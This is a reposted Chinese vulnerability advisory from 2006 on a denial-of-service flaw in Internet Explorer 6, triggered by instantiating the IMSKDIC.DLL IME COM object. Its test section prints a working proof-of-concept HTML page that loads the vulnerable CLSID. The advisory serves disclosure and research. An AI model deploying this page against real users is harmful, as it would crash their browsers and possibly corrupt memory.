[转载]Microsoft IE IMSKDIC.DLL COM对象实例化拒绝服务漏洞
信息来源:绿盟科技发布日期:2006-08-15
更新日期:2006-08-16
受影响系统:
Microsoft Internet Explorer 6.0 SP2
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19521
Internet Explorer是微软发布的非常流行的WEB浏览器。
Internet Explorer在试图将IMSKDIC.DLL(Microsoft IME)COM对象实例化为ActiveX控件时可能会破坏系统内存,导致拒绝服务。
<*来源:nop ([email]nop@xsec.org[/email])
链接:[url]http://marc.theaimsgroup.com/?l=bugtraq&m=115567041206657&w=2[/url]
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
=============== IMSKDIC.DLL.htm start ================
<!--
// Internet Explorer (IMSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// nop (nop#xsec.org)
// [url]http://www.xsec.org[/url]
// CLSID: {6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}
// Info: Microsoft IME SingleKanjiDictionary interface
// ProgID: IMESingleKanjiDict.8.1
// InprocServer32: C:\WINDOWS\IME\imjp8_1\Applets\IMSKDIC.DLL
--!>
<html><body>
<object classid="CLSID:{6E3197A3-BBC3-11D4-84C0-00C04F7A06E5}" ></object>
</body></html>
=============== IMSKDIC.DLL.htm end ==================
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
[url]http://www.microsoft.com/windows/ie/default.asp[/url]
页:
[1]